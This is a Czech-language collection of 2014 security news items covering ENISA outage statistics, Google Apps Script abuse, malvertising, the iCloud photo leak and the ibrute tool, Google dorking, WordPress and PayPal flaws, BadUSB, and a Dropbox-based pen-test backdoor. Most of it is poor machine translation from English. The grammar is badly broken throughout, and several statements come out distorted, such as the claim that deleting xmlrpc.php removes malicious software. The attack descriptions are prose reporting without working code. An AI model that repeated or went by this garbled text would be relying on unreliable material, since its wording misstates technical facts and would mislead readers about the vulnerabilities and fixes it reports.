To je skvělé pro běžné uživatele Security cibule, a ještě lépe pro čtenáře, kteří dosud zkoumaných a investovali do bezpečnosti cibulkou. Nyní je čas, aby se seznámili a zlepšit povědomí o situaci, zejména s ohledem na skutečnost, že je to National Cyber Security Awareness měsíc . :-)
Vše, co potřebujete, je k dispozici na Dougovy blogu: http://blog.securityonion.net/2014/10/new-securityonion-bro-scripts-and.html
Systémové poruchy způsobují většinu velkých výpadky komunikačních služeb 29.9.2014 Hrozby Agentura Evropské unie pro bezpečnost sítí a informací (ENISA) zveřejnila zprávu o rozsáhlé výpadky v odvětví elektronických komunikací. Poskytuje souhrnnou analýzu bezpečnostních incidentů v roce 2013, které způsobily vážné výpadky.
Většina incidenty hlášeny regulátory a ENISA podílí mobilního internetu a mobilní telefonie připojení. Nejčastějšími příčinami jsou poruchy systému, které ovlivňují především základnových stanic a přepínačů. Výroční zpráva je výsledkem procesu široký incidentu EU, podávání zpráv, který byl zahájen v roce 2012, na základě článku 13a rámcové směrnice (2009/140 / ES). Incidenty jsou hlášeny na národní operátory k vnitrostátních regulačních orgánů (NRA). . Nejzávažnější výpadky jsou hlášeny každoročně vnitrostátními regulačními orgány na agenturu ENISA a Evropské komise Hlavní závěry jsou shrnuty níže: 90 vážné incidenty hlášeny: . Letos 19 zemí uvedlo 90 významné události, zatímco devět zemí oznámilo žádné významné události Mobilní sítě nejvíce postižených: Přibližně polovina z hlavních výpadků podílí mobilního internetu a mobilní telefonie. Vliv na tísňová volání: 21% z velkých incidentů mělo dopad i na tísňových volání (přístup k 112). Většina (61%) výpadky způsobené selháním systému: Most . času tato selhání systému byly softwarové chyby, selhání hardware a software chybám, které ovlivňují přepínače a základnových stanic Přírodní jevy mají největší dopad z hlediska uživatelských hodiny ztratil: Často drsné počasí (husté sněžení, vichřice), vedl k napájení nebo kabelů řezy , což vedlo k vážným výpadkům v oblasti uživatelských hodin ztracených. Majetek většinou byly postiženy základnových stanic, přepínače a mobilní ústřednou. Výkonný ředitel agentury ENISA profesor Udo Helmbrecht komentářů: "veřejné komunikační sítě a služby jsou páteří digitální společnosti EU. Naším cílem je přispět ke zvýšení odolnosti a bezpečnosti elektronické komunikace. Hlášení a diskutovat o skutečné události Incident je důležité porozumět rizikům a co může být lepší. ENISA bude nadále spolupracovat s regulačními orgány EU v oblasti telekomunikací na podporu účinné a efektivní podávání zpráv o bezpečnostních událostech. "
Google Apps skripty mohou být snadno zneužity podvodníky 24.9.2014 Hrozby Andrew Cantino, VP of Engineering v Mavenlink, ale také chyba lovec ve svém volném čase, zjistil, že Google Apps Skripty mohou být zneužity útočníky do e-mailu uživatelům přístup "a další informace. "Google Apps Script je výkonný skriptovací prostředí, poskytuje Google které mohou způsobit ověřené žádosti vůči uživatelských dat uvnitř vlastností Google, "vysvětlil a poukázal na to, že při povolování Apps Script Google, uživatelé nejsou jasně řečeno, že to umožňuje přístup třetích stran ke svým údajům, který může dělat sociální inženýrství útoky příliš snadné. "Horší je, že Google Apps Skripty jsou v doméně Google, tak i zdatným uživatelům, kteří hledají podezřelých domén bude se zmást," řekl poznamenal . Aby jí dokázal svou pravdu, on vytvořil aplikaci, kterou nazval "Google Security Upgrader "pomocí jednoduchého Google Apps Script udělal, a které pouze vytváří nový štítek Gmail.
Pokud by byl uživatel stáhnout aplikaci, bude vidět, že aplikace požádá, aby mohla zobrazit a spravovat svou poštu, ale mnoho uživatelů si neuvědomuje, co to vlastně znamená a prostě poskytnout aplikaci, která povolení. Pokud útočníci ovládal tuto aplikaci, ale stihnul udělat celou řadu škodlivých věcí, včetně odstranění nebo krádeže dat, manipulaci osobní údaje, se snaží dále šířit skript posílám odkaz všem lidem v seznamu kontaktů uživatele, a další. Cantino oznámil Google svých zjištěních , ale teď, se společnost rozhodla, že s tím nic dělat. "To je v současné době pracuje, jak byla navržena, a není technickým zranitelnost," všimli si, ale dovolil mu, aby o vydání veřejnosti. Cantino chtěli vidět, přinejmenším velké oznámení řekl: "Tato aplikace byla vytvořena třetí osobou a není spjata s firmou Google ", kdy jsou uživatelé vyzváni k autorizaci takové aplikace. "Jak to je, myslím, že je nesmyslné očekávat, že by uživatelé pochopili možnost, že škodlivý kód by mohl být vykonán, zatímco zbývající zcela v rámci domény Google," říká. "Je ironií, že po schválení, Google pošle e-mail s vysvětlením, že třetí app strana byla oprávněna, ale v tuto chvíli je to tak, jak je pozdě! App již přístupné údaje uživatele, a smazal, odcizení, nebo manipulovat jej. "
Škodlivé reklamy zasáhly Amazon, YouTube i Yahoo, říká Cisco
10.9.2014 Hrozby Obětmi sofistikované kampaně na šíření malwaru se podle společnosti Cisco stala řada populárních serverů. Reklama uživatele přesměruje na jinou webovou stránku, ze které se do jejich počítače automaticky stáhne škodlivý software. V ohrožení jsou jak uživatelé operačních systémů Windows, tak i platformy OS X od Applu. Výzkumníci škodlivou kampaň pojmenovali „Kyle and Stan“ podle jmen, která se objevila u subdomén více než 700 webových stránek, které útočníci využívají k šíření malwaru.
„Velký počet domén dovoluje útočníkům používat jednu konkrétní doménu pouze po omezenou dobu. Této domény se později zbaví a pro útoky začnou využívat jinou,“ napsal výzkumník společnosti Cisco Armin Pelkmann. Útočníci tímto současně obcházejí reputační bezpečnostní nástroje a blacklisty. Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »
Výzkumníkům se zatím nepodařilo identifikovat reklamní síť, která uživatelům zobrazuje škodlivé reklamy. Některé z podvodných reklam se objevily na takových serverech, jako jsou YouTube, Amazon nebo Yahoo. Celkem se problém týká 74 domén. Vzhledem k vysoké návštěvnosti uvedených webů mohl počet postižených uživatelů dosáhnout velkých hodnot.
Některé ze stažených souborů obsahují také legitimní software jako třeba video přehrávač. K napadení uživatele dojde až po otevření stažených souborů. „Útočníci se spoléhají čistě na techniky sociálního inženýrství. Pomocí nich se snaží uživatele přesvědčit k instalaci softwarového balíčku,“ napsal Pelkmann.
Cisco na škodlivé reklamy narazilo již v květnu, ovšem narazit na ně lze i nyní. Podle společnosti nebude možné tuto síť zcela zničit, dokud nedojde i identifikaci jejích provozovatelů.
Dejte si pozor na podvody po celebrity nahé foto novinky 6.9.2014 Hrozby
Jak FBI potvrdil , že se vyšetřování úniku nahých fotografií (některé skutečné, některé falešný) o sto ženských celebrit, hon na člověka (s?) za to je také on-line, jako 4chan uživatelé se snaží vyslídit totožnost zrádce. Další věc, zjistit, jak ty fotky byly ukradeny. Apple oprava chybu zabezpečení v Find My iPhone on-line služby, které by mohly být použity pro přístup k iCloud účty celebrit tím, brute-nutí hesla, po Nástroj využití vada byla zveřejněna na GitHub den předtím, než byly unikly obrázky. autor Tento nástroj uvedl, že je velmi nepravděpodobné, že by byl použit pro hack, protože "je to velmi obtížné provést tento druh cíleného útoku za jeden den." Odhalení , že sdělovací prostředky byly stále nabídek ke koupi fotografie pro týdny, než se zdá únik potvrdit. Ale, jak zdůraznil , že je možné, že hackeři zneužít stejnou chybu. Stejně jako v tomto případě odhaluje, Symantec Satnam Narang varuje uživatele, aby dávat pozor na Apple ID phishing a SMSishing pokusů, které jsou určitě sledovat novinky a o odkazy, které údajně vedou k fotografiích, ale ve skutečnosti se jim škodlivé zfalšovaných webových stránek se snaží dostat k instalaci malwaru. UPDATE: Andrew Jaquith, CTO a SVP Cloud strategie na SilverSky, se s námi podělil o svůj názor na hack:
Podíval jsem se na kód "ibrute" na GitHub také, a dospěl k závěru, že to byla zahrada-odrůda brute-force útok. Kód by dovede k závěru, že spekulace o Apple není omezení počtu pokusů při ověřování na Find My iPhone přes JSON je v pořádku. To je jasně určen pro použití aplikacemi a není obrazovka rozhraní prohlížeče. ještě zajímavější, "fmipmobile.icloud.com" hostitele, který ibrute kód overuje se nachází v 76 dalších projektů, GitHub. Skoro každý jeden z nich jsou určeny, aby programátoři dotaz umístění iPhone. Takže toto ověření vektor byl jednoznačně dobře známo, že širší programové komunity. To jen tak se stalo, že některé oportunní hackeři si uvědomil, že by mohl být použit k brute-force hesla k účtům, protože neměl účinné kontroly uzamčení. tahání zpět na 10.000 stop: můžeme očekávat, že toto bude další příklady, jako je tento: využití (1) cloud služby API autentizace - určeny pro použití programátory - že (2) jsou bezpečnostní kontroly, které jsou méně přísné než ty, které jsou uživatelsky orientovaný. Tento hack iCloud je pouze nejvyšší příklad profilu, ale lze očekávat, že oportunisté hledat slabiny v každém případě, kdy je mobilní aplikace, nebo nativní dotýká vzdálené cloud služby. iCloud, Google Play Services a různé mobilní app obchody jsou poctivá hra, stejně jako mnoho dalších.
DHS naléhá na webové stránky, správci, aby se minimalizovalo riziko, Google hacking 3.9.2014 Hrozby
Je to všeobecně známý fakt, že Google Search je cenným nástrojem pro útočníky, kteří hledají způsob, jak do informačních systémů organizací. "Google hacking" byl použit pro let o průniku testery a bezpečnostních výzkumníků. Ars Technica uvádí , že americké ministerstvo pro vnitřní bezpečnost a FBI nedávno rozeslal oznámení na policii, veřejné bezpečnosti a bezpečnostních sil, varoval je o "Dorkingu Google ", tj hacking (klikněte na screenshotu vidět celý dokument): "Tím, hledání specifických typů a klíčových slov souborů, škodlivých kybernetických herců můžete najít informace, jako jsou uživatelská jména a hesla, e-mailové seznamy citlivých dokumentů, detaily bankovních účtů, a webové stránky zranitelnosti, "vysvětluje upozornění. "Například, jednoduchá obsluha: klíčové slovo syntax, jako filetype: xls intext: uživatelské jméno ve standardním vyhledávacího pole bude načítat tabulky aplikace Excel obsahující uživatelská jména mohou navíc volně k dispozici on-line nástroje spustit automatické skenování. použití více ňouma dotazů. " Oznámení rovněž zmiňuje dva případy, kdy "Dorkingu" bylo použito k porušení webových stránek a upozorní čtenáře na existenci Diggity projektu , bezplatné testování penetrace nástroje Suite, která umožňuje uživatelům / útočníci automatizovat ňouma dotazy Google. Google hacking by neměl být takový úspěšný postup v případě, vlastníci a správci stránek se postaral zabezpečit své webové stránky, ale skutečnost je taková, že mnoho ne, a občas by mělo být připomenuto, jak to udělat. Se zvyšující se "pozornost" vláda a vymáhání práva webové stránky jsou přijímání z hacktivists v posledních několika letech, bude seznam opatření ke zmírnění rizika, že dokument obsahuje určitě přijde vhod.
86% hackerů se nemusíte starat o důsledky 25.8.2014 Hrozby Thycotic oznámila výsledky průzkumu 127 self-poznal hackeři na Black Hat USA 2014 . Průzkum zjistil, že 86% hackerů jsou přesvědčeni, že se nikdy čelit důsledky pro jejich činnost. V dvousečný meč hlavolam, 88% respondentů také věří, že jejich vlastní osobní údaje (PII), je v nebezpečí on-line krádeží.
Na otázku, jaké typy zaměstnanců, které by s největší pravděpodobností cíl poprvé s cílem získat přihlašovací údaje pro konkrétní společnost, 40% dotázaných uvedlo, že hackeři by se začít s dodavatelem. To je důležité zejména vzhledem k tomu, že Edward Snowden byl dodavatel, a používal jeho přednostní přístup ukrást citlivé dokumenty NSA. Navíc 30% respondentů by se nejprve zaměřit IT administrátorům, zdůrazňuje význam uzamčení řízení přístupu k privilegovaným účtům. Ostatní klíč poznatky z průzkumu.
Více než polovina (51%) z hackerů tvrdí, že jejich činy jsou motivovány fun / vzrušení hledají, zatímco pouze 18% uvedlo, že jsou motivovány finančním ziskem. Mezitím, 29% tvrdí, že jsou motivováni společenského vědomí nebo morální kompas. 99% respondentů se domnívá, že zjednodušující hackerské taktiky, jako je phishing jsou stále účinné. 53% hackerů nevěří uživatelé se učí, aby se zabránilo takové taktiky. "Motivace a vnitřní fungování dnešního hackerské komunity byly vždy poněkud záhadné, ale škody, které můžete udělat, aby podniku je bolestně jasné," řekl Jonathan Cogley, zakladatel a CEO společnosti Thycotic. "Vysvětlení, proč hackeři dělat to, co dělají, je prvním krokem, jak IT bezpečnostní týmy přijmout opatření k lepší kontrole a monitorování přístupu k firemním tajemstvím. Organizace musí dělat lépe chránit hesla a privilegované přihlašovací údaje spojené s dodavateli a správci IT, jak těchto zaměstnanců jsou obrovské cíl pro cybercriminal činnost. "
Kritická chyba v WordPress plugin umožňuje webu únos 21.8.2014 Hrozby Populární WordPress plugin, který umožňuje majitelům stránek snadno přizpůsobit kontaktní formulář má zásadní chybu, která může být zneužita ke stažení a vzdáleně upravovat databázi na webu a získat přístup a kontrolu webu - není účet nebo ověřování potřebné.
Objev byl vyroben výzkumníky bezpečnostní firmy Sucuri a vývojáři plugin - vlastní kontaktní formuláře - byly oznámeny, ale nakonec se stěhoval do patch díru až poté, co tým WordPress Security tlačil problém. Všechny verze zásuvného modulu s výjimkou poslední (5.1.0.4) jsou ovlivněny, a uživatelé se doporučuje provést aktualizaci co nejdříve. Vzhledem k tomu, absence reagování na vlastní kontaktní formuláře tým, možnost přepnutí na jinou formu přizpůsobení plugin jako je gravitace, nebo formuláře, celý WP apartmá, které nabízí funkce je také stojí za zvážení. Vlastní Kontaktní formulář byl stažen více než 600.000 krát. Kdyby jen polovina z těchto uživatelů aktivně používat, že je stále ještě značný počet ohrožených WordPress míst venku. Mimochodem, WordPress a Drupal uživatelé by také opravit svá zařízení proti nedávno objevené zranitelnosti , které má vliv na parsování internetového protokolu XML-RPC používá pro cross-platformní komunikaci, a které mohou být zneužity k zahájení útoků DoS. Společnou prací, WordPress a Drupal bezpečnostní týmy se rychle vydala aktualizovaný, že tento problém vyřešit. "existuje chyba zabezpečení ve všech WordPress a Drupal verze, která postihuje více než 250 milionů webových stránek, což je zhruba 23% internetové stránce populace dnes, "výzkumníci Incapsula poukázal . "V kombinaci s extrémně velkým bazénem cílů a vysokého potenciálu škod, to dělá zneužití trojitou hrozbu -. Rozšířené, ochromující a těžko vyřadit" Pokud z nějakého důvodu nemůžete aktualizovat WP nebo instalace Drupal, škodlivý software může být vyhasl odstraněním xmlrpc.php .
Dvoufázovou ochranu PayPalu lze snadno obejít
6.8.2014 Hrozby Bezpečnostní nástroj, který má chránit uživatelské účty služby PayPal před zneužitím, je podle zjištění australského výzkumníka možné obejít.
Uživatelé PayPalu si mohou vybrat, zda chtějí pro přístup ke svým účtům používat ověření pomocí šestimístného kódu, který obdrží formou textové zprávy. Pole pro vložení tohoto kódu se objeví teprve po správném zadání uživatelského jména a hesla. Bezpečností nástroj, který je znám jako dvoufázová autentizace, nabízí stále více provozovatelů online služeb jako třeba Google a v případě mnoha finančních služeb jde v podstatě o nezbytnou věc. Jelikož je kód zasílán offline nebo generován mobilní aplikací, je pro hackery velmi těžké jej získat. Nikoliv však nemožné. Joshua Rogers, sedmnáctiletý hoch z australského Melbourne, přišel na způsob, jak získat přístup k účtům používajícím dvoufázovou autentizaci. Detaily svého útoku zveřejnil na svém blogu poté, co PayPal navzdory jeho upozornění chybu ani po měsíci neopravil. Tím, že Rogers vyšel s chybou ven, přijde o odměnu, kterou PayPal obvykle vyplácí bezpečnostním výzkumníkům za nalezení a upozornění na zranitelnosti. Údajně si mohl přijít až na 3 tisíce dolarů. „Na penězích mi nezáleží. V životě jde mnohem o víc,“ napsal Rogers.K provedení útoku musí hacker znát přístupové údaje uživatele k účtům na službách eBay a PayPal. Pro škodlivé programy však není zase tak složité je získat. Hlavní problém je na webové stránce eBay, která uživatelům umožňuje propojit účty obou služeb. Propojením účtů totiž dojde k vytvoření cookie, díky které si aplikace PayPal myslí, že je uživatel přihlášen, přestože nezadal šestimístný kód. Funkce prý vůbec nezjišťuje, jestli má uživatel dvoufázovou autentizaci zapnutou. Rogers zveřejnil video útoku na YouTube.
Zástupci PayPalu se k situaci zatím nevyjádřili.
Bezpečnostní aplikace, programy, Velká Británie zaostává za USA 2.8.2014 Hrozby UK podniky zaostávají amerických podniků, pokud jde o programy bezpečnostních aplikací. Nová studie IDG bylo zjištěno, že v průměru společnosti z Velké Británie jsou výdaje přibližně o 21 procent méně než v USA společností stejné velikosti. Studie také zjistila, že ve Velké Británii, 66 procent z interně vyvíjených aplikací zůstává neprověřených pro kritické zranitelnosti, jako SQL injection. Podniky ve všech odvětvích přinášejí nové mobilní zážitky, využití mrak a Big datové analýzy, a digitalizují své procesy. Výsledkem je, že aplikace jsou dnes hnací silou hospodářského růstu, a všechny podniky se stávají digitální podniky. V průměru jsou podniky vnitřně vyvíjet 2500 aplikací ročně. Kromě nižších výdajů na zabezpečení aplikací, studie také ukázala, že společnosti z Velké Británie jsou více pravděpodobné, že soustředit své bezpečnostní aplikace, programy pouze na podmnožinu business-critical aplikace, spíše než . Celé portfolio aplikací Naopak, organizace ve Spojených státech je více pravděpodobné, že vydat pověření pro programy pro posuzování bezpečnosti aplikace v celém podniku - výrobu programů na amerických podniků, v průměru, zralejší, než na britských podniků. Když se programy zabezpečení aplikace nejsou přesahují obchod- kritické aplikace, podniky opustit tisíce aplikací zranitelné. To vytváří bezpečnostních hrozeb dlouhodobé i kyber-zločinci útočí na cestu nejmenšího odporu do IT infrastruktury, bez ohledu na to, zda byla aplikace business-critical nebo málo používaný webových aplikací. "Společnosti jsou stále lepší zabezpečení svých sítí a koncové body, které způsobují kybernetických zločinců zaměřit své úsilí na aplikační vrstvě. Výsledkem je, že více než polovina všech úspěšných porušení jsou připisovány na aplikační vrstvě zranitelnosti, "řekl Adrian Beck, ředitel pro správu zabezpečení programu, EMEA. "Uzavření bezpečnostních mezeru mezi počtem aplikací jsou vyrobeny a číslo, které jsou posuzovány pro bezpečnost pomůže britské společnosti zůstat konkurenceschopné v novém aplikačním ekonomiky."
BadUSB zneužívá disky USB k útokům na počítače a smartphony
1.8.2014 Hrozby Bezpečnostní experti objevili nového červa s názvem BadUSB, který se šíří pomocí disků USB a který dokáže nebezpečně přeprogramovat klávesnice, web kamery a další zařízení připojovaná pomocí portů USB.
Experti ukáží BadUSB na veřejnosti příští týden na konferenci Black Hat v Las Vegas. Pomocí tohoto červa mohou útočníci naprogramovat disk USB tak, aby se choval například jako síťová karta a navedl tak počítače na podvodné webové stránky. Experti příští týden ukáží také útoky, které fungují u telefonů s operačním systémem Android.
„Pokud cokoli připojíte k portu USB, měli byste si být opravdu jistí, o co jde,“ uvedl Karsten Nohl ze společnosti Security Research Labs v Berlíně. „Vždy tam může na pozadí běžet nebezpečný kód. Pokaždé, když někdo připojí zařízení USB k vašemu počítači, musíte mu opravdu věřit.“
BadUSB je sofistifikovanější než pouze nahraný červ typu Stuxnet na flash disk. BadUSB totiž funguje na jakémkoli typu zařízení s portem USB a je téměř nemožné jej detekovat bez pokročilých forenzních metod – antivirové programy jsou na něj krátké. Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »
A co je možná ještě horší, zařízení infikovaná BadUSB je mnohem těžší této nákazy zbavit. Pouhé zformátování disku ničemu nepomůže, jelikož škodlivý kód je nahrán přímo do firmwaru disku. Problému se tak lze zbavit pouze instalací původního firmwaru. „Příště, až na svém počítači objevíte virus, musíte předpokládat, že je infikováno i vaše příslušenství a počítače lidí, kteří je připojovali k tomuto příslušenství,“ uvedl Nohl s tím, že útok BadUSB je podobný nakažení spouštěcích sektorů pevných disků. Klíčový rozdíl je však v tom, že většinu útoků na spouštěcí sektory lze odhalit pomocí antivirů.
V rámci prezentace na BlackHat zvané „BadUSB – když se příslušenství promění v ďábla“ budou provedeny čtyři ukázky, a to:
přeměna nového disku USB na počítačovou klávesnici, která otevře příkazový řádek na napadeném PC a vloží pokyn, který stáhne nebezpečný kód přeměna nového disku USB v síťovou kartu, která způsobí, že počítač bude využívat podvodný doménový server, jenž uživatele navede na nebezpečné webové stránky naprogramování nového disku USB tak, aby infikoval legitimní instalační soubor Ubuntu přeměna telefonu s Androidem v nebezpečnou síťovou kartu
Podle Nohla se běžní uživatelé proti BadUSB prakticky nemohou bránit. Nejlepší obranou je připojovat k počítači opravdu jen zařízení od lidí, kterým věříte. Problémem totiž je, že disky USB (na rozdíl třeba od příslušenství založeném na standardu Bluetooth, jež využívá kryptografické zámky) nebyly nikdy k zabránění těmto útokům určeny.
Jsou koncové nejzranitelnější část sítě? 29.7.2014 Hrozby Pouze 39% společností, které pokročilé zabezpečení koncových bodů ochrany na místě, i když 74% respondentů se domnívá koncové být "nejzranitelnější" na kybernetické útoky, a 76% uvádí, že počet koncových bodů stoupá.
Kromě toho 58% respondentů uvedlo, že tradiční anti-virus obrany již řešit pokročilé cílené hrozby a pouze 19% si myslí, že bude hrát důležitou roli v budoucnosti. nový průzkum Promisec zjistil, že 70% IT profesionálů jsou buď "velmi" nebo "mírně" znepokojen potenciálním narušení bezpečnosti v příštím roce, ale pouze 32% uvedlo, že jsou "dobře připraveni" pro kybernetického útoku. 74% respondentů považuje koncové body, jako jsou stolní počítače, notebooky a mobilní zařízení, se "nejzranitelnější" součástí sítě. Názorný příklad, pouze 32% firem uvedlo, že byli schopni dokončit Microsoft aktualizace propojovací za méně než týden, i když tyto aktualizace hrají klíčovou roli eliminuje známé zranitelnosti. Navíc, 34% uvedlo, že to trvalo až měsíc, 19% uvedlo, že převzal měsíčně a 14% "nikdy" dosáhnout plného zavádění aktualizací. Navzdory těmto pro zabezpečení koncových bodů výzev, pouze 30% má vyhrazený pro zabezpečení koncových bodů rozpočtu. Více než polovina respondentů uvedla, že je větší potřeba SIEM a / nebo pokročilé detekce hrozeb a korelačních systémů mají hlubší analýzy koncových bodů. Respondenti do kategorií jako "velmi důležité" jako koncové body jsou společné útok bod a monitorování těchto míst vstupu jsou životně důležité pro identifikaci útoku a podnikat kroky k sanaci. Většina VP a C-Level IT vůdců dotázaných uvedla zvýšenou obavu z narušení bezpečnosti v příštím roce, a uznal, rychle se posunující oblasti bezpečnosti, která nyní zahrnuje zabezpečení koncových bodů.
33% z VP a C-Level IT lídrů uvedlo, že mají pokročilé koncových ochrany na místě, ale 75% uvedlo, že mají potřebu hlubší analýzy koncových bodů s cílem napomoci při detekci hrozeb. Téměř 70% z VP a C-Level IT lídrů dát koncové body na vrcholu své nejzranitelnější seznamu. Drtivá většina VP a C-Level IT Leaders (83%) uvádí, antivirové řešení nejsou součástí jejich budoucnost pro ochranu proti pokročilých hrozeb. Alarmující 86% z VP a C-Level IT Leaders mají zvýšený strach z porušení v průběhu příštího roku. "Bezpečnostní prostředí se neustále vyvíjí v reakci na nový druh složitějších a sofistikovanějších hrozbami, kde tradiční blokování a preventivní mechanismy, jako je například firewall, anti-virus a anti-malware software, jsou prostě už nestačí, aby se naše sítě v bezpečí , "řekl Dan Ross, generální ředitel společnosti Promisec. "Náš průzkum ukazuje, že společnosti začaly přijmout Endpoint Security jako klíčovou součást svého celkového portfolia cenných papírů, ale ještě přijmout robustní sledování koncových bodů a sanace infrastrukturu řešit dnešní nejzávažnější hrozby." Firmy se snaží udržet krok s moderní cílená hrozby:
55% respondentů uvádí, že "nejsou jisti", že bezpečnostní opatření, která mají na místě bude chránit proti všem scénářů. 40% respondentů uvedlo, že jsou jen "mírně" udržet krok s BYOD a trendy mobility jako počet koncových bodů zvýší v jejich síti. 45% respondentů uvedlo, že došlo pouze "mírný nárůst" v jejich společnosti, posílení jejího zaměření na bezpečnost v reakci na hrozby, ale stále ještě existují možné mezery v zabezpečení. 58% uvedlo, že zaměstnanci jsou dostatečně kompatibilní a opatrní, ale věří, že by mohl dělat lepší práci, založení a prosazování základních protokolů. 56% respondentů uvedlo, že záplatování, sanace a dodržování jsou největší problémy, vzhledem k Endpoint Security.
Odemknutí skrytou hodnotu informací 26.7.2014 Hrozby Nestrukturovaný obsah představuje 90% všech digitálních informací. Tento obsah je uzamčen v různých formátech, míst a žádostí podaných do samostatných úložišť, podle IDC. Když připojeny a správně použity, tyto informace zpravidla může pomoci zvýšit výnosy, snížit náklady, reagovat na potřeby zákazníků rychleji a přesněji, nebo uvést výrobky na trh rychleji. "Uvolnění informací z tohoto obsahu není triviální úkol, a mnoho organizací čelí zátarasy z důvodu nedostatku vhodných technologií a procesů," řekl Dave Schubmehl, ředitel pro výzkum, obsah Analytics, Discovery, a kognitivní systémy . "IDC vyrazil lépe pochopit, co se lídři v této oblasti jsou na tom lépe nebo jinak než ostatní, jak se kombinuje nové technologie, procesy a posílení personálu odemknout skryté hodnotu informací." Abychom pochopili, co organizace dělají pro extrakci hodnoty z jejich nestrukturovaného obsahu, IDC průzkum 2155 organizací v šesti zemích a provedla hloubkové rozhovory s 11 organizací ve Spojených státech a Evropě. IDC pak identifikoval sadu předních organizací, které mají vysoký znalostní kvocient (KQ) -. Skóre vyvinutý společností IDC, která určuje schopnost organizace odemknout skryté hodnotu informací "Tato analýza odhalila, že organizace s předními KQ skóre, které představují deset procent našeho vzorku, jsou pětkrát větší pravděpodobnost než ostatní, aby zažít výhody z přístupu k informacím, analýzu a sdílení projektů, které překračují očekávání, "uvedl Dan Vesset, viceprezident Business Analytics a Big dat společnosti IDC. "Poučení z organizací dotazovaných a průzkumu v rámci této studie ukazují, že uvolnění skrytou hodnotu informací může přinést okamžité a hmatatelné výsledky." Studie rovněž zjistila, že většina organizací je třeba překonat i technologie a organizační problémy, aby se stal KQ Vedoucí . Jedním z klíčových úkolů organizace čelí, je schopnost měřit přínosy projektu. IDC zjistila, že 63% z dotazovaných organizací nebyly vyčísleny přínosy z jejich přístupu k informacím, analýzy a projekty sdílení.
Nejnebezpečnější superhrdinové pro vyhledávání on-line 24.7.2014 Hrozby Ačkoli on strávil roky bojuje za dobro v komických knihách a na velké obrazovce, Superman se objevil jako jeden z webového největších darebáků, když je nejvyšší v McAfee je "nejvíce toxických nadčlověka" studie. Studie analyzovala, které superhrdiny vyhledávání vedl k nejvíce rizikové webové stránky, ukázat, že Thor, Wonder Woman a Aquaman, těsně následován za Superman v druhém a společném třetím místě. Studie používá McAfee SiteAdvisor hodnocení webu zjistit, které superhrdiny vyhledávání, která vedla k nejrizikovější webové stránky. Bylo zjištěno, že hledání "Superman", "Superman a zdarma torrent download", "Superman a hodinky", "Superman a zdarma app" a "Superman a on-line", přineslo 16,5% šanci na přistání na webové stránky, které pozitivně testován na on-line hrozbami, jako je spyware, adware, spam, phishing, viry a další malware. Studie ukazuje, které stránky jsou nebezpečné při hledání superhrdiny jména na webu a výpočtu celkového rizika procenta. Top 10 superhrdinové z letošní studie s nejvyššími procenty rizika jsou:
"Zatímco vyhledávání vašich oblíbených superhrdinů on-line by se mohlo zdát nevinné v době, kdy" řekl Raj Samani, CTO, McAfee EMEA, "musíme si uvědomit, že zločinci využít jejich popularity k cíli nic netušící spotřebitele, kteří hledají více informací. Tyto zločinci nás chtějí nalákat na nebezpečné stránky, které mohou vážně infikovat počítače a zařízení, a dokonce ukrást osobní údaje ". tipů, jak zůstat chráněni: Být podezřelé: Pokud se při vyhledávání se objeví odkaz na volném obsahu nebo příliš dobré-k-být- skutečné nabídky, mít na pozoru. Double-check webovou adresu: Podívejte se na překlepy nebo jiné stopy, které stránky, které se chystáte, nemusí být bezpečné. Hledat bezpečně: Použijte webový bezpečnostní poradce, který vás upozorní na potenciální rizikové stránky, než kliknete na . je Chraňte se sami sebe: Používejte komplexní bezpečnostní software na všech vašich zařízeních se chránit před nejnovějšími hrozbami.
Cloud služby: Díry v zabezpečení podnikové sítě 15.7.2014 Hrozby
Mezi nejpopulárnější použití pro cloudové služby patří: ukládání obrazových skenování pasů a jiných osobních dokladů; synchronizace hesla, seznam kontaktů, a databází email / zpráv; vytváření webů; ukládání verzí zdrojových kódů, atd. Při ukládání dat služba cloud-based Dropbox oznámil opravenou chybu v jeho odkaz generátoru, je opět rozpoutala on-line diskuse o tom, jak důležité je šifrování důvěrných dat před nahráním do on-line úložiště, a to i soukromá. No, šifrování souborů (FLE) skutečně chránit důvěrné informace uložené v cloudu, a to i v případě, že jsou slabá místa v řízení přístupu k uživatelským dokumentů s některými cloud storage služby.
Je lákavé si myslet, že si můžete zajistit se proti všem možným rizikům pomocí šifrování dat, než si ji nahrát do úložiště cloud služby, nebo o upuštění od cloudové služby dohromady. Ale je to skutečně pravda? Jak se ukázalo, ne, to není.
Internet je plný doporučení o tom, jak "efektivně využívat cloudových úložišť služby", včetně rad o tom, jak na dálku ovládat PC , monitoru počítače, když jste pryč , správu stahování torrentů , a mnoho dalších věcí. Jinými slovy, uživatelé vytvářet všechny typy mezer samy o sobě. Tyto nedostatky pak mohou být snadno zneužita Trojan, červ, nemluvě cybercriminal, a to zejména v cílených útoků.
Takže jsme se zeptali sami sebe: jak pravděpodobné je, že firemní sítě může být infikován prostřednictvím cloudu?
Na konferenci Black Hat 2013, Jacob Williams, vedoucí vědecký pracovník v CSRgroup Computer Security Consultants, dal prezentaci na použití Dropbox proniknout do firemní sítě. Při provádění penetrační test, zkušební (testovací pero), Jacob použil Dropbox tenký klient nainstalován na notebooku se nachází mimo podnikovou síť k šíření škodlivého softwaru zařízení v této síti.
Jacob poprvé použit phishingu infikovat zaměstnance počítač, a pak vložené škodlivé skripty do dokumentů uložených v cloudu hostil složky notebooku. Dropbox automaticky aktualizována (synchronizovány) infikované dokumenty na všech zařízeních připojených k účtu uživatele. Dropbox není ojedinělá v tomto ohledu: všechny aplikace, které poskytují přístup k oblíbeným cloud souborových služeb mají funkci automatické synchronizace, včetně Onedrive (aka SkyDrive), Google Disk, Yandex Disk, atd.
Když uživatel otevře infikovaný dokument na pracovní stanici umístěné v podnikové síti, jsou škodlivé skripty vložené v dokumentu nainstalován backdoor DropSmack na této stanici - to byl speciálně vytvořený Jacob pro tento pera testu. Jak jeho název napovídá, hlavním rysem DropSmack je, že se používá pro ukládání souborů služby Dropbox cloud jako kanál pro řízení backdoor a úniku firemních dokumentů přes firemní firewall.
Vývojový diagram na Jacob Williams experimentu
V testu pera, Jacob použil úžasně jednoduchý způsob proniknout do firemní sítě - to je zřejmé, mezera!
